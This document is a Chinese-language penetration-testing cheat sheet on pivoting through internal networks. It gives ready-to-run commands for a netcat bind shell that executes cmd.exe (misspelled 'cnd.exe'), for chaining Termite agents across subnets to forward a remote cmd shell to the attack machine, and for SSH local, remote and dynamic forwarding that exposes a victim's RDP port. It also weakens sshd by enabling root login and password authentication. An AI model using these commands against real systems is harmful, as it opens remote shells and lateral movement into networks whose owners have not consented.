一、NC

目标机
nc.exe -l -p 1122 -t -e cnd.exe

攻击机

nc.exe 192.168.8.149 1122

二、termite

程序地址, http://rootkiter.com/Termite/
一款极度小巧灵活的跳板机,有别于传统socks代理,它对于复杂内网环境下的渗透适用性更强,操作也极为简便
程序分为两部分,admin[为控制端]和agent[为代理端节点],admin和agent所有选项用途均一致
-| 指定本地socks端口,等待远程连
-C 指定远程socks机器ip
-p 指定远程socks机器端口

正向连接

vnet2：

agent_Win32.exe -1 8888

vnet1：

agent_Win32.exe -1 7777

桥接：
agent_Win32.exe -1 6666


攻击机：

admin_Win32.exe -c 192.168.0.240 -p 6666
goto 1
connect 192.168.10.137 7777
goto 2
connect 192.168.20.128 8888
goto 3
shell 1188  #将vnet2的cmd转发到本地的1188端口
nc 127.0.0.1 1188

反向连接

桥接：

agent_Win32.exe -1 6666

vnet1：

agent_Win32.exe -1 7777

vnet2：

agent_Win32.exe 192.168.20.132 -p 7777

vnet1(新开一个cmd)：

agent_Win32.exe -c 192.168.10.138 -p 6666

攻击机：
admin_Win32.exe -c 192.168.0.240 -p 6666

三、SSH

1、本地端口转发(跳板机有外网和内网地址)

跳板机配置
vim /etc/ssh/sshd_config //SSH配置文件

AllowAgentForwarding yes            //是否允许转发TCP协议
GatewayPorts yes                    //是否允许远程主机连接本地转发端口
PermitRootLogin yes                 //是否允许root用户登陆
PasswordAuthentication yes          //是否允许使用基于密码的认证
TCPKeepAlive yes                    //保持心跳，防止ssh断开

service ssh restart //开启ssh服务

攻击机

ssh命令参数：

* -C      压缩传输，加快传输速度
* -f      将SSH转入后台执行，不占用当前的shell
* -N      建立静默连接（建立了连接，但是看不到具体会话）
* -g      允许远程主机连接到本地用于转发的端口
* -L      本地端口转发
* -R      远程端口转发
* -D      动态转发（socks代理）
* -P      指定SSH端口


ssh -CfNg -L 2121:1.1.1.10:3389 root@192.168.1.11      //将受害机的3389端口转发到本地2121端口，1.1.1.10是受害机，192.168.1.11跳板机
rdesktop 127.0.0.1:2121      //访问本地2121端口，就是访问受害机的3389端口

2、远程端口转发（跳板机没有外网地址，但是可以访问外网）

跳板机

ssh -R 3307:1.1.1.2:3389 root@192.168.1.9 //1.1.1.2是受害机，192.168.1.9是攻击机

攻击机

rdesktop 127.0.0.1:3307

3、动态端口转发（跳板机有外网地址，有内网）

ssh -D 7000 root@192.168.1.12 //攻击机与跳板机建立隧道，192.168.1.12是跳板机，root是跳板机的用户名

可以使用127.0.0.1 7000做代理访问内网服务